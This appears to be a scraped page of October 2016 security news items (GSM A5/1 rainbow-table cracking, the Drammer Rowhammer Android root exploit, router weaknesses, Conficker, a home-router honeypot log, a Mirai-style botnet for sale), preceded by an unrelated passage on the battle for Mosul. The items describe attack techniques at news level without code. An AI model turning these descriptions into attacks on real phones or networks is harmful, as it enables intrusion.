Kurdish Peshmerga – While Iraqi security forces have been attacking from the south, Kurdish forces from Iraqi Kurdistan have advanced from the east and north. The Kurdish forces, known as Peshmerga, are in some instances fighting alongside Iraqi forces. A marriage of convenience, it is a potentially uneasy alliance. Both have an immediate needed to defeat ISIS — as well as a U.S.-brokered oil deal signed in August. And, while the Iraqi government wants to eliminate ISIS’ presence in Iraq, the Kurds have an additional motive–that of becoming an independent, internationally recognized state.
Iraqi Militias – The majority of the Iraqi militias are Shiite Muslims backed by Iran. They aren’t officially part of the Iraqi security forces, but do fight in concert with them. According to NBC News, “while not officially part of the Iraqi security forces, the Popular Mobilization Units, or PMU, was formally recognized by the Baghdad government earlier this year as an ‘independent military formation.’ The PMU’s involvement in the ISIS fight has drawn significant criticism. An Amnesty International report this week accused the militias of ‘war crimes’ and ‘gross human rights violations,’ alleging its fighters were guilty of torturing, forcibly disappearing and executing Sunni Muslims they suspected of being ISIS sympathizers.”
Turkey – While Turkey’s involvement in the Mosul operation is still somewhat ambiguous, Turkey has set up a base in Kurdish-controlled territory inside Iraq. This is an action which has angered the Baghdad government, because it has not sanctioned Turkey’s presence. Turkey has, however, been training local Sunni tribesmen to join the assault on Mosul and local Christian and Yezidi fighters have also joined the offensive.
International Forces – On the ground the U.S. has more than 4,800 troops stationed in Iraq and reportedly “a good sizable portion” are at Qayyarah Airfield, a base 40 miles south of Mosul. Then too, some 200 U.S. personnel are embedded with Iraqi and Kurdish forces closer to the front. These are mostly special forces with advisory roles and Joint Terminal Attack Controllers who call in airstrikes. The US is joined by other nations in carrying out NATO’s “train, advise and assist” mandate. This includes forces from Australia, New Zealand, France, Sweden, Italy, Denmark and others.
In the midst of gearing up for battle, a chemical weapons cache was uncovered. Photographs taken in mid-October of the weapons, in addition to chemical readings from the stockpiled weapons, were obtained by the ground team of Ed Alexander of BLACKOPS Cyber, an intelligence agency which specializes in counterterrorism, advanced cyber capabilities and Darknet operations.
Iraqi troops had captured the cache of chemical weapons, which were previously held by ISIS in Qayarah, Iraq, a city east of ISIS territory in Mosul. This location is not far from where ISIS fired artillery shells filled with mustard gas at U.S. troops last month. One of three tests on the weapons showed a positive reading of a mustard agent, according to Military.Com.
The discovery of the weapons cache validates growing concerns that ISIS is planning to use chemical weapons against U.S. and Iraqi forces during the Mosul battle.
Iraqi forces requested that coalition forces assist with the recovery and containment of the weapons, including the 36 rockets found at the site, Alexander said.
According to an article by Joshua Phillip, at Epoch Times:
“According to Drew Berquist, a former intelligence contractor who recently returned from deployment in Iraq, ISIS has two factories for making homemade rockets—one in Raqqa, Syria, and another in Mosul—and said ‘that’s what these look like.’
He said the picture of the rockets are telling, ‘because they do that all over the region,’ and that it’s likely ISIS has stepped up its production for the coming fight for Mosul because ‘they view this as an apocalyptic battle.’”
Berquist also cautioned that the rockets can be fitted with different types of weapons, including chemical and explosive weapons. He said that ISIS has definitely used chemical weapons. “They’ve got them, and they’ll try to use them in the days and weeks ahead in Mosul.”
Moreover, Dr. Robert J. Bunker, adjunct faculty at Claremont Graduate University, who has studied chemical warfare, indicated that the images do show positive readings of chemical weapons.
ISIS has already massacred 284 villagers, including children, who were being used as human shields. The terrorist group has also taken 550 families hostage for continued use as human shields in Mosul, according to the UN. But, they too are at risk of being killed.
Local families have been waving the white flag as ISIS rounds up villagers in an attempt to hold off the approaching coalition forces in the battle for Mosul. Unfortunately, the waving of the white flags has been in vain.
Hacking GSM A5 crypto algorithm by using commodity hardware
25.10.2016 securityaffairs Mobil
Researchers demonstrated how to crack GSM A5/1 Stream Cipher using a general-purpose graphics processing unit computer with 3 NVIDIA GeForce GTX690 cards.
A group of security researchers from the Agency for Science, Technology and Research (A*STAR), demonstrated that the crypto scheme used in the GSM mobile phone data can be easily hacked within seconds. Actually, it was already known that the A5/1 is vulnerable, at least since 2009.
Weaknesses in crypto algorithms (A3 algorithm for authentication, A5 algorithm for encryption, A8 algorithm for key generation) that were not submitted to peer review due to non-disclosure are the main security issued for 2G implementations.
GSM only authenticates the user to the network and not vice versa. The security model, therefore, offers confidentiality and authentication, but limited authorization capabilities, and has no non-repudiation features. GSM uses several cryptographic algorithms for security. The A5/1 and A5/2 stream ciphers are used for ensuring over-the-air voice privacy. Both algorithms have been exploited:
A5/2 is exploitable with a real-time a ciphertext-only attack
A5/1 with a rainbow table attack.
Main security concerns regarding with GSM are :
Communications and signaling traffic in the fixed network are not protected.
Does not address active attacks, whereby some network elements (e.g. BTS: Base Station)
Only as secure as the fixed networks to which they connect
Lawful interception only considered as an after-thought
Terminal identity cannot be trusted
From a purely technological perspective 3G networks use the KASUMI block crypto instead of the older A5/1 stream cipher, but also KASUMI cipher is affected by several serious weaknesses.
Now the researchers from the A*STAR, Singapore, have demonstrated how to break the A5/1 stream cipher implemented by 2G by using commodity hardware.
“GSM uses an encryption scheme called the A5/1 stream cipher to protect data,” explained Jiqiang Lu from the A*STAR Institute for Infocomm Research. “A5/1 uses a 64-bit secret key and a complex key-stream generator to make it resistant to elementary attacks such as exhaustive key searches and dictionary attacks.”
The researchers have exploited two security weaknesses to compute a look-up table using commodity hardware in 55 days. Once calculated the rainbow table, that has a side of 984GB, they are able to determine the secret key used to encrypt communications in just nine seconds.
The new method improves the classic brute force attack drastically reducing the time required for computation.
“We used a rainbow table, which is constructed iteratively offline as a set of chains relating the secret key to the cipher output,” added Lu.
“When an output is received during an attack, the attacker identifies the relevant chain in the rainbow table and regenerates it, which gives a result that is very likely to be the secret key of the cipher.”
The experts used an equipment composed of a general-purpose graphics processing unit computer with three NVIDIA GeForce GTX 690 cards, for a total cost of about $15,000.
“On a general-purpose graphics processing unit (GPGPU) computer with 3 NVIDIA GeForce GTX690 cards that cost about 15,000 United States dollars in total, we made a unified rainbow table of 984 GB in about 55 days, and implemented a unified rainbow table attack that had an online attack time of 9 s with a success probability of 34 % (or 56 %) when using 4 (respectively, 8) known keystreams (of 114 bits long each).” reads the white paper entitled Time–Memory Trade-Off Attack on the GSM A5/1 Stream Cipher Using Commodity GPGPU in the journal Applied Cryptography and Network Security. “If two such tables of 984 GB were generated, the attack would have an online attack time of 9 s with a success probability of 81 % when using 8 known keystreams. The practical results show again that nowadays A5/1 is rather insecure in reality and GSM should no longer use it.”
Millions of Android smartphones exposed to new Drammer Android attack
25.10.2016 securityaffairs Android
A new method of attack dubbed DRAMMER could be exploited to gain ‘root’ access to millions of Android smartphones and take control of affected devices.
Earlier last year, security researchers from Google’s Project Zero outlined a way to hijack the computers running Linux by abusing a design flaw in the memory and gaining higher kernel privileges on the system.
Now, the same previously found designing weakness has been exploited to gain unfettered “root” access to millions of Android smartphones, allowing potentially anyone to take control of the affected devices.
Experts from the VUSec Lab at Vrije Universiteit Amsterdam have discovered a vulnerability that could be exploited to gain “root” access to millions of Android smartphones targeting the device’s dynamic random access memory (DRAM). using an attack called
The attack called Rowhammer, is not new, but this is the first time it was successfully used against target mobile devices.
On March 2015, security researchers at Google’s Project Zero team demonstrated how to hijack the Intel-compatible PCs running Linux by exploiting the physical weaknesses in certain varieties of DDR DRAM (double data rate dynamic random-access memory) chips.
By exploiting the rowhammer technique the hackers can obtain higher kernel privileges on the target system. Rowhammer is classified as a problem affecting some recent DRAM devices in which repeatedly accessing a row of memory can cause bit flips in adjacent rows, this means that theoretically an attacker can change any value of the bit in the memory.
The Rowhammer attack for mobile device involves a malicious application that once in execution repeatedly accesses the same “row” of transistors on a memory chip in a tiny fraction of a second (Hammering process)
Hammering a specific portion of memory can electrically interfere with neighboring row. This interference can cause the row to leak electricity into the next row, which eventually causes a bit to flip and consequent data modification.
An attacker can exploit these modifications to execute its code and gain control of the device.
In short, Rowhammer is an issue with new generation DRAM chips in which repeatedly accessing a row of memory can cause “bit flipping” in an adjacent row that could allow anyone to change the value of contents stored in the memory.
The researchers created a proof-of-concept exploit, dubbed DRAMMER, to test mobile the Rowhammer attack on mobile devices.
Details on the DRAMMER attack are included in a paper published by the experts and on this page.
To test the Rowhammer attack on mobile phones, the researchers created a new proof-of-concept exploit, dubbed DRAMMER. The hack could modify crucial bits of data allowing attacker to root Android devices from major vendors, including Samsung, OnePlus, LG, and Motorola.
The experts exploited the Android mechanism known as the ION memory allocator to give an app a direct access to the dynamic random access memory (DRAM). The ION memory allocator also allows the attackers to identify adjacent rows on the DRAM, which is essential to power the Rowhammer attack by generating bit flips.
The ability allowed the researchers to achieve root access on the victim’s device, giving them full control of the mobile device.
“On a high level, our technique works by exhausting available memory chunks of different sizes to drive the physical memory allocator into a state in which it has to start serving memory from regions that we can reliably predict,” states the paper.
“We then force the allocator to place the target security-sensitive data, i.e., a page table, at a position in physical memory which is vulnerable to bit flips and which we can hammer from adjacent parts of memory under our control.”
“Drammer is a new attack that exploits the Rowhammer hardware vulnerability on Android devices. It allows attackers to take control over your mobile device by hiding it in a malicious app that requires no permissions. Practically all devices are possibly vulnerable and must wait for a fix from Google in order to be patched. Drammer has the potential to put millions of users at risk, especially when combined with existing attack vectors like Stagefright or BAndroid.” states a blog post published by the researchers.
The experts successfully rooted Android handsets including Google’s Nexus 4 and Nexus 5; LG’s G4; Samsung Galaxy S4 and Galaxy S5, Motorola’s Moto G models from 2013 and 2014; and OnePlus One.
“Not only does our [DRAMMER] attack show that practical, deterministic Rowhammer attacks are a real threat to billions of mobile users, but it is also the first effort to show that Rowhammer is…(reliably exploitable) on any platform other than x86 and with a much more limited software feature set than existing solutions,” reads a paper published by the experts.
The DRAMMER app is able to take over the victim’s mobile within minutes and doesn’t request user’s interaction.
The researchers published two following proof-of-concept videos that demonstrate DRAMMER attack in action against an unrooted LG Nexus 5.
In the first video, the phone is running Android 6.0.1 with security patches Google released on October 5, while in the second one the researchers show how the DRAMMER attack can be combined with Stagefright bug that is still unpatched in many older Android devices.
The researchers have released on GitHub the source code of the DRAMMER app in order to allow users to test their mobile device and anonymously share their results.
The experts reported the issue to Google in July, and the tech giant recognized it as a “critical” vulnerability and awarded the researchers $4,000 under its bug bounty program.
The issue is expected to be partially solved with the upcoming November security bulletin, in this way it will be more difficult for attacker to launch a DRAMMER attack.
The problem is that some software features that DRAMMER exploits are so essential to any OS, it is not possible to remove or modify them without a significant impact on the overall design of the device.
Kaspersky Lab launched the new Lab ICS-CERT
25.10.2016 securityaffairs Security
Kaspersky Lab has launched a new global computer emergency response team (CERT), the Kaspersky Lab ICS-CERT, focusing on industrial control systems (ICS)..
Kaspersky has anticipated launching an Industrial Control Systems CERT. Of course, I’m joking, anyway I always sustained that the creation of a similar structure represents an important achievement for the cyber security of any government.
Kaspersky has presented the Kaspersky Lab ICS-CERT, an infrastructure that aims to share the knowledge of cyber threats and in securing industrial systems. The Kaspersky Lab ICS-CERT will coordinate the exchange of information between stakeholders, making more efficient the adoption of countermeasures and the rapid response in case of security incidents.
“Industrial Systems Emergency Response Team is a special Kaspersky Lab project that will offer the wide range of information services, starting from the intelligence on the latest threats and security incidents with mitigation strategies and all the way up to incident response and investigation consultancy and services. In addition to the latest intelligence about threats and vulnerabilities, Kaspersky Lab’s Industrial CERT will share expertise on compliance. Being a non-commercial project, ICS CERT will share information and expertise to its members free of charge.” wrote Kaspersky on the Kaspersky Lab ICS-CERT page.
Like any other CERT, also the Kaspersky Lab ICS-CERT will share information of the current threat landscape reporting and share information on the latest threats, vulnerabilities, security incidents, mitigation strategies, compliance, and investigations.
It is important to highlight that the initiative launched by Kaspersky is a non-commercial project, the experts of the company will share information for free.
Of course, it is essential for the success of the initiative that ICS product vendors, government agencies, critical infrastructure operators, and other actors will provide their precious contribute.
Everyone benefits of the contribution made to this type of initiative, it will be particularly important for any organizations using ICS-SCADA systems that will find all the information aggregated in a single portal, on their hands they could share any experience related to cyber threats increasing the level of awareness of the overall community.
“Today’s approach to cyber security highlights the importance of accumulating intelligence on the latest threats, in order to develop protection technologies. This is especially true for industrial infrastructure, which has specific threats, highly customized hardware and software, and strict requirements for reliability,” explained Andrey Doukhvalov, head of future technologies and chief security architect at Kaspersky.
“As a security vendor, we have years of experience analyzing threats and helping industrial operators with threat prevention and detection, incident response, staff training, and the prediction of future attack vectors. We are confident that sharing intelligence, or, in a broader way, exchanging knowledge between vendors and operators, is an important step towards more secure critical infrastructure,” “By establishing ICS-CERT we are expanding the availability of the industry’s expertise in a way that no other private security vendor has done before.”
Domácí routery nejsou bezpečné, varuje Eset
25.10.2016 SecurityWorld Hrozby
Mezi nejčastější problémy patří softwarové zranitelnosti a slabá hesla – kvůli nim je každý sedmý směrovač zranitelný. Internetový router se tak může jednoduše stát doslova Achillovou patou zabezpečení.
Eset uveřejnil průzkum, který se zaměřil na jednu z nejvíce podceňovaných bezpečnostních hrozeb – domácí routery. Vyplynulo z něj, že 15 procent testovaných zařízení používá slabá hesla, nejčastěji s uživatelským jménem „admin“.
Z průzkumu dále vyplynulo, že přibližně 7 % testovaných zařízení obsahovalo zranitelnost, kterou bychom mohli označit jako středně nebo vysoce vážnou. Skenování portů odhalilo, že síťové služby jsou velmi často přístupné nejen z vnitřních, ale i z externích sítí.
„Test se zaměřil na kontrolu výchozích uživatelských jmen a hesel a jejich nejčastěji používaných kombinací. Je znepokojující, že v jednom případě ze sedmi byl útok úspěšný,” říká Peter Stančík, Security Evangelist v Esetu.
„Zejména nezabezpečené služby jako je Telnet by rozhodně neměly být otevřené a to ani do interních sítí, což bylo bohužel zjištěno ve 20 procentech případů,“ dodává Stančík.
Většina nalezených zranitelností, více než 50 %, vycházela z nevhodně nastavených přístupových práv.
Druhou nejčastější zranitelností (40 %) bylo zneužití použitých příkazů metodou „command injection“. Ta cílí na spouštění libovolných příkazů ve vzdáleném operačním systému skrze zranitelnosti v aplikacích, které nemají dostatečně ošetřeno ověření vstupů.
Bezmála 10 % softwarových zranitelností se pak týkalo takzvaného cross-site scriptingu (XSS), který umožňuje útočníkovi měnit konfiguraci routeru tak, aby mohl spouštět škodlivé skripty na straně klienta.
„Výsledky ukazují, že routery lze napadnout poměrně jednoduše zneužitím některé z nalezených zranitelností. Mohou se tak stát Achillovou patou zabezpečení domácností i malých firem,” dodává Stančík.
Výsledky se sbíraly od uživatelů řešení Esetu (Smart Security a Smart Security Premium), kde je nově implementovaná funkce ochrany domácí sítě, která umožňuje uživatelům zjistit případné zranitelnosti v podobě špatné konfigurace, potenciálně nebezpečné síťové služby či slabého hesla na jejich domácích routerech.
Do pátečního útoku na populární weby mohl zasáhnout i váš router nebo IP kamera. Zkontrolujte si je
24.10.2016 Živě.cz Počítačový útok
Internet v pátek zažil masivní DDoS útok a nefungovalo při něm množství velkých webů. Jak upozornil web Motherboard, na útoku se podílela zařízení z botnetu Mirai, který zahrnuje i zařízení tzv. internetu věcí (IoT) jako jsou routery či IP kamery.
Podle dostupných informací se do útoku zapojilo jen 10 % zařízení z botnetu, ale i to stačilo k tomu, aby byly vyřazeny z provozu populární služby jako Twitter, PlayStation Network, PayPal a další.
Chcete-li zjistit, zda může být součástí podobného botnetu i jedno z vašich síťových zařízení, vyzkoušejte webovou službu Bull Guard.
Nástroj skenuje primárně IoT zařízení v síti a zjišťuje možné zranitelnosti, případně využití defaultních, výrobcem předdefinovaných hesel. Právě ta jsou totiž velmi častým důvodem, proč se zařízení do podobného botnetu dostane.
Pokud Bull Guard taková zařízení objeví, upozorní na ně. Uživatel by měl následně přístupové údaje změnit. To by měl koneckonců udělat při koupi každého zařízení - zejména pokud bude připojeno k internetu.
Zákeřný červ děsí bezpečnostní experty i po letech
21.10.2016 Novinky/Bezpečnost Viry
První verze zákeřného červa Confickera začala internetem kolovat už v roce 2008. Přestože zabezpečení počítačových systémů od té doby prošlo značným vylepšením, nové verze této hrozby stále nepřestávají strašit. Aktuálně dokonce tento nebezpečný malware kraluje statistikám nejrozšířenějších virových hrozeb.
Ve zmiňovaném roce 2008 byl Conficker několik dlouhých měsíců nejrozšířenější hrozbou vůbec, platilo to prakticky i celý rok 2009. V uplynulých letech však o sobě tento nezvaný návštěvník nedával vůbec vědět.
Zlom nastal až v letošním roce, kdy jej kyberzločinci začali hojně využívat. V tuzemsku i v zahraničí tak podle analýzy antivirové společnosti Check Point představoval tento červ nejrozšířenější hrozbu vůbec.
„Conficker byl v září celkově zodpovědný za 14 procent všech detekovaných útoků,” upozornil David Řeháček, bezpečnostní odborník ze společnosti Check Point.
Napadl i počítače v elektrárně
Conficker využívá zranitelnost operačního systému Windows. Pro tu už dávno existuje bezpečnostní záplata, ale jak je ze statistik zřejmé, s její instalací si velká část uživatelů hlavu neláme. Na konci dubna se dokonce ukázalo, že se tento nebezpečný červ uhnízdil v počítačích v bavorské jaderné elektrárně Gundremmingen. [celá zpráva]
Autoři Confickera vybudovali po celém světě velkou síť infikovaných PC, využitelných na libovolnou úlohu, poněvadž počítače mohou díky viru ovládat na dálku. Na jeho řízení použili autoři červa inovativní způsob. Každý den se vygenerují nové náhodné domény, kam se vir hlásí a žádá instrukce.
Tím prakticky bezpečnostním expertům znemožňují, aby mohli Confickera zcela vyřadit z provozu.
Důležité jsou aktualizace
Většina antivirových programů by si nicméně i s tou nejnovější verzí měla poradit. Pokud ne, mohou pomoci s jeho vystopováním nejrůznější on-line antivirové skenery. Ty jsou zpravidla k dispozici zadarmo.
Jak zajistit, aby se červ do počítače vůbec nedostal? Bezpečnostní experti důrazně doporučují nainstalovat do počítače všechny přístupné bezpečnostní aktualizace, které jsou dostupné přes systém automatických aktualizací nebo přes stránku Windows Update.
New Drammer Android Hack lets Apps take Full control (root) of your Phone
24.10.2016 thehackernews Android
Earlier last year, security researchers from Google's Project Zero outlined a way to hijack the computers running Linux by abusing a design flaw in the memory and gaining higher kernel privileges on the system.
Now, the same previously found designing weakness has been exploited to gain unfettered "root" access to millions of Android smartphones, allowing potentially anyone to take control of affected devices.
Researchers in the VUSec Lab at Vrije Universiteit Amsterdam have discovered a vulnerability that targets a device's dynamic random access memory (DRAM) using an attack called Rowhammer.
Although we are already aware of the Rowhammer attack, this is the very first time when researchers have successfully used this attack to target mobile devices.
What is DRAM Rowhammer Attack?
The Rowhammer attack against mobile devices is equally dangerous because it potentially puts all critical data on millions of Android phones at risk, at least until a security patch is available.
The Rowhammer attack involves executing a malicious application that repeatedly accesses the same "row" of transistors on a memory chip in a tiny fraction of a second in a process called "Hammering."
As a result, hammering a memory region can disturb neighboring row, causing the row to leak electricity into the next row which eventually causes a bit to flip. And since bits encode data, this small change modifies that data, creating a way to gain control over the device.
In short, Rowhammer is an issue with new generation DRAM chips in which repeatedly accessing a row of memory can cause "bit flipping" in an adjacent row that could allow anyone to change the value of contents stored in the memory.
Is Your Android Phone Vulnerable?
To test the Rowhammer attack on mobile phones, the researchers created a new proof-of-concept exploit, dubbed DRAMMER, and found their exploit successfully altered crucial bits of data in a way that completely roots big brand Android devices from Samsung, OnePlus, LG, Motorola, and possibly other manufacturers.
The researchers successfully rooted Android handsets including Google's Nexus 4 and Nexus 5; LG's G4; Samsung Galaxy S4 and Galaxy S5, Motorola's Moto G models from 2013 and 2014; and OnePlus One.
"Not only does our [DRAMMER] attack show that practical, deterministic Rowhammer attacks are a real threat to billions of mobile users, but it is also the first effort to show that Rowhammer is...(reliably exploitable) on any platform other than x86 and with a much more limited software feature set than existing solutions," the researchers wrote in their paper [PDF] titled, "Drammer: Deterministic Rowhammer Attacks on Mobile Platforms."
How does the DRAMMER Attack Work? (Exploit Source Code)
The researchers created an app — containing their rooting exploit — that requires no special user permissions in order to avoid raising suspicion. The DRAMMER attack would then need a victim to download the app laced with malware (researchers' exploit code) to execute the hack.
The researchers took advantage of an Android mechanism called the ION memory allocator to gain direct access to the dynamic random access memory (DRAM).
Besides giving every app direct access to the DRAM, the ION memory allocator also allows identifying adjacent rows on the DRAM, which is an important factor for generating targeted bit flips.
Knowing this, the researchers then had to figure out how to use the bit flipping to achieve root access on the victim's device, giving them full control of the target phone and the ability to do anything from accessing data to taking photos.
"On a high level, our technique works by exhausting available memory chunks of different sizes to drive the physical memory allocator into a state in which it has to start serving memory from regions that we can reliably predict," the paper reads.
"We then force the allocator to place the target security-sensitive data, i.e., a page table, at a position in physical memory which is vulnerable to bit flips and which we can hammer from adjacent parts of memory under our control."
Once you download this malicious app, the DRAMMER exploit takes over your phone within minutes – or even seconds – and runs without your interaction. The attack continues to run even if you interact with the app or put your phone in "sleep" mode.
The researchers expect to soon publish an app [source code available here] that will let you test your Android smartphone yourself and anonymously include your results in a running tally, which will help researchers track the list of vulnerable devices.
DRAMMER Has No Quick Fix
The group of researchers privately disclosed its findings to Google in July, and the company designated the flaw as "critical," awarding the researchers $4,000 under its bug bounty program.
Google says the company has informed its manufacturing partners of the issue earlier this month and has developed a mitigation which it will include in its upcoming November security bulletin to make the DRAMMER attack much harder to execute.
However, the researchers warned that one could not replace the memory chip in Android smartphones that have already been shipped.
And even some software features that DRAMMER exploits are so fundamental and essential to any OS that they are difficult to remove or modify without impacting the user experience.
In short, the attack is not easy to patch in the next generation of Android phones.
Video Demonstration of DRUMMER Attack on Android 6.0.1
The researchers have also published two proof-of-concept videos that demonstrate DRAMMER attack in action against an unrooted LG Nexus 5.
In the first video, the phone is running Android 6.0.1 with security patches Google released on October 5.
In the second video, the researchers show how the DRAMMER attack can be combined with Stagefright bug that remains unpatched in many older Android handsets.
The Stagefright exploit gives the researchers an advanced shell, and by running the DRAMMER exploit, the shell gains root access.
The researcher's exploit can target the majority of the world's Android phones.
"Our research shows that practical large-scale Rowhammer attacks are a serious threat and while the response to the Rowhammer has been relatively slow from vendors, we hope our work will accelerate mitigation efforts both in industry and academia," the researchers concluded.
The group research focuses on Android rather than iOS because the researchers are intimately familiar with the Google's mobile OS which is based on Linux. But the group says it would theoretically be possible to replicate the same attack in an iPhone with additional research.
For more detailed information, you can head on to this informational page about DRAMMER and this paper published early this morning.
Peníze do technologií ano, do vzdělávání lidí ne -- firmy riskují, že jim zabezpečení dat selže
24.10.2016 SecurityWorld Hrozby
Firmy v tuzemsku chápou význam zajištění bezpečnosti svých dat i aplikací a investují nemalé prostředky do technologií. Často ale zapomínají na to, že by měli investovat také do lidí, kteří s těmito technologiemi pracují.
Podle průzkumů jsou v současné době až dvě třetiny firem do značné míry závislé na IT, objemy nashromážděných dat se každoročně zvyšují o třetinu.
Zajištění bezpečnosti dat a systémů vedení firem ve valné většině vnímají jako svou prioritu, investice do zabezpečení podle informací Gartner aktuálně meziročně narostly o 3,6 %.
Často ale zapomínají na investici do lidí, kteří s těmito systémy pracují, což drasticky snižuje jejich schopnost účinně se bránit i efektivnost vynaložených prostředků. Přitom krádež nebo poškození dat, případně pokus o ně, zažilo v posledním roce téměř 70 % firem.
„Vrcholoví manažeři si v současné době uvědomují, že investice do zabezpečení firemních dat a systémů jsou nezbytné. Málokdy ale pamatují také na to, že samotné systémy bez vzdělaných odborníků, kteří si udržují povědomí o aktuálních trendech a hrozbách, jsou neúčinné,“ říká William Ischanoe, produktový manažer kurzů oblasti IT bezpečnost ve firmě Gopas.
Ta pořádá v těchto dnech svou klíčovou konferenci HackerFest 2016 zaměřenou na IT bezpečnost a etický hacking. Prezentuje se zde například to, jak útočí současní hackeři, která nebezpečí číhají v kyberprostoru, jaké jsou největší aktuální hackerské hrozby, nebo k čemu hackeři využívají ovládnuté počítače. Partnerem konference je naše vydavatelství.
24 hours in the life of my home router by Francisco J. Rodriguez
24.10.2016 securityaffairs Attack
Recently a massive DDoS attack has disconnected a large portion of users from the Internet, hackers exploited IoT devices. Is your router secure?
“Are we ready to live in a world where all devices are exposed to cyber attacks?”
That is how I opened my presentation in QurtubaCON16 – cyber security event at Córdoba City (Spain) – and how I will open the next event: HoneyCON16 (Guadalajara, Spain) at November 11th. My intention is that every person takes their own conclusions about the risks that everybody assumes every time we connect our devices to the internet.
Have you ever wondered happens in your home router and that threats lurk in the moment you press the power button?
In this article, I intend to analyze the attacks and the cybersecurity events I have received in my personal router in Spanish ISP. This information may lead you to become aware of the high risk of having these devices connected to the web, even when we expose our lives on social media.
I have exposed my personal router to possible attacks because home routers haven’t been receiving the appropriate attention and, in some cases, people use to let them on during the entire year. People use to let these devices completely exposed and they don’t realize that sometimes administrator control panel is vulnerable and they are vulnerable to certain attacks or have different security flaws that have not been patched or by our Internet provider or by the device manufacturer.
We recommend you to visiting http://routersecurity.org/ to find more information about bugs and detected vulnerabilities in the last years to home routers and some recommendations.
In recent years, there has been news about vulnerabilities in routers distributed in Spain that show the seriousness of the matter:
http://www.hackplayers.com/2015/02/250k-routers-de-telefonica-mismas-clav es-ssh.html
http://www.muycomputer.com/2015/03/20/700-000-routers-adsl-isp-vulnerable s
http://www.redeszone.net/2015/01/06/los-routers-de-movistar-adb-pirelli-p-dg a4001n-tienen-un-grave-fallo-de-seguridad/
http://www.pcworld.es/seguridad/un-estudio-espanol-descubre-60-vulnerabilid ades-en-22-modelos-de-routers
What if an attacker gains access to the DNS settings of your router and modifies it?
It is not just about losing our privacy (because a cybercriminal could monitor your internet navigation); it is about letting an attacker to theft your identity, for example, in your personal bank or company website to obtain your credentials. This is just an example of what could really happen.
In many cases, the received attacks are automatic, so, if your router is in the cybercriminal range you could be a potential victim. The typical excuse “I am nobody” is not valid. You only need to be on the range – it doesn’t need to be an personal attack. The greater the number of potential victims greater the percentage of success.
To recollect all this events and cyberattacks, I usually use a sensor to redirect all the traffic that goes to my public IP that corresponds to my own router. I monitor all incoming activity in TCP and UDP range. I also monitor ICMP packets. I consider as suspicious every traffic addressed to my IP and I follow any attempt of connection to my TCP port.
Keep in mind that an IP address of a possible attacker by itself is not a relevant fact, since you can use different techniques to hide the real IP source or even the attacker can use a device already breached for his attack through him. At no time did I spread my IP address to receive attacks.
Data collection occurred between Wednesday, October 6 at 6PM and Thursday, October 24 at 6PM.
Once data collection time have finished, I present you the results:
In 24 hours they produced a total of 20,070 events to my home router, which I consider as 4678 attacks. There has been a total of 92 different countries from which connections have received a total of 349 different ports.
More than half of the events were received from Asia. Among the ports that have received more connections, we highlight the SSH, Telnet, 443, 2323, RDP, VNC, 8080 among other services. If I ever have published that my services were exposed, we could ask ourselves what they are looking for and how they found me. We can know it if we perform an analysis of everything that has occurred.
Among the origins of events, it is normal lately find Vietnam on top. The answer to this can be found in details in the following article: http://securityaffairs.co/wordpress/52015/hacking/mirai-botnet.html
It happens due to a large number of infected IOT devices with MIRAI that have among their targets Spanish IP.
The graph above shows the traffic received from attacks (not all the events) during these 24 hours of analysis (Origin country, ASN, IP and port):
Some highlights countries by the number of attacks carried out (A, IP, and Port):
Most of the attacks have received European and Asian origin. We have also received a small share of attacks from Spain.
Analyzing some of the IPs that have attacked my router I could find the following web administration panels corresponding to cameras and routers:
Some of them do not need credentials for access and others have default credentials. They have visited my router (or perhaps any team behind that network), are connected to my decoy ports have downloaded malware samples have tried to include me in their botnet, they have used my gateway for attacks, including other activities.
There have been downloaded several samples of malware, including Mirai:
But it has not been the only malware that has tried to download. You can see below the demonstration of the large number of downloads using Wget that have attempted:
Once all the data were observed, you should ask yourself if your home router could be attacked or not. Don’t ask if it was attacked or not: ask when it will be. Thinking about the information presented in this article, maybe you are a little more aware that it will happen to you soon or later. I hope this time you have not your router exposed, have your credentials too weak and have exposed more information than necessary. Maybe you’ve already been attacked and still don’t know.
If you do not have these tips in mind, perhaps your IP address would appear on the next list.
Best regards.
These one and more articles are available at www.fwhibbit.es
My talk about honeypots:
Twitter: @0fjrm0
Hackers offered an loT botnet for $7,500. The recent attack may be just a test
24.10.2016 securityaffairs BotNet
The security firm RSA revealed to have discovered in early October, hackers advertising access to a huge IoT botnet on an underground criminal forum.
Last week, a massive DDoS attack against the Dyn DNS service, one of the most authoritative domain name system (DNS), caused an extended Internet outage. A large portion of internet users was not able to reach most important web services, many websites including Twitter, GitHub, PayPal, Amazon, Reddit, Netflix, and Spotify were down for netizens in the US.
The Dyn DNS Service was flooded by a devastating wave of requests originated by million of compromised IoT devices. The Dyn company reported a huge army of hijacked Internet of Things devices has been abused by attackers to power the massive DDoS attack.
The security intelligence firm Flashpoint published an interesting post on the massive DDoS in which confirm that its experts have observed the Mirai bots driving the attack against DynDNS.
“Flashpoint has confirmed that some of the infrastructure responsible for the distributed denial-of-service (DDoS) attacks against Dyn DNS were botnets compromised by Mirai malware. Mirai botnets were previously used in DDoS attacks against security researcher Brian Krebs’ blog “Krebs On Security” and French internet service and hosting provider OVH.” reads the analysis published by Flashpoint “Mirai malware targets Internet of Things (IoT) devices like routers, digital video records (DVRs), and webcams/security cameras, enslaving vast numbers of these devices into a botnet, which is then used to conduct DDoS attacks. “
Below the Key Findings of the report published by Flashpoint
Flashpoint has confirmed that some of the infrastructure responsible for the distributed denial-of-service (DDoS) attacks against Dyn DNS were botnets compromised by Mirai malware.
Mirai botnets were previously used in DDoS attacks against the “Krebs On Security” blog and OVH.
As of 1730 EST, the attacks against Dyn DNS are still ongoing. Flashpoint is coordinating with multiple vendors and law enforcement to track the infected devices that constitute the botnet being used to conduct these attacks.
Unfortunately, the situation could be worse because hackers are selling access to a huge botnet composed of compromised Internet of Things (IoT) devices.
The security firm RSA revealed to have discovered in early October, hackers advertising access to a huge IoT botnet on an underground criminal forum.
“This is the first time we’ve seen an IoT botnet up for rent or sale, especially one boasting that amount of firepower. It’s definitely a worrying trend seeing the DDoS capabilities grow,” Daniel Cohen, head of the RSA’s FraudAction business unit, told Forbes.
According to RSA the hackers advertised an IoT botnet that is able to power DDoS attack with a 1 Tbps of traffic, the same volume of traffic that flooded the French hosting provider OVH. It is not clear if the botnet was composed of devices infected by the Mirai malware.
The hackers were offering a botnet composed of 50,000 devices for $4,600, meanwhile 100,000 bots the price is $7,500.
Cohen clarified that RSA has no evidence that the botnet is linked to infrastructure that hit the Dyn DNS service on Friday.
